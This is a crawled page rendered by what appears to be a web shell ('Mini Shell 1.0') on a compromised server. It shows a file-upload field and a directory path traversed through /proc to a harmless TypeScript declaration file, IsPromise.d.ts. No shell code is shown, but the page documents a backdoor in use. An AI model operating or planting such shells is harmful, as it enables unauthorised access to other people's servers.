HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/IsPromise.d.ts
declare function IsPromise<T>(x: PromiseLike<T>): x is Promise<T>;
declare function IsPromise(x: unknown): x is Promise<any>;
export = IsPromise;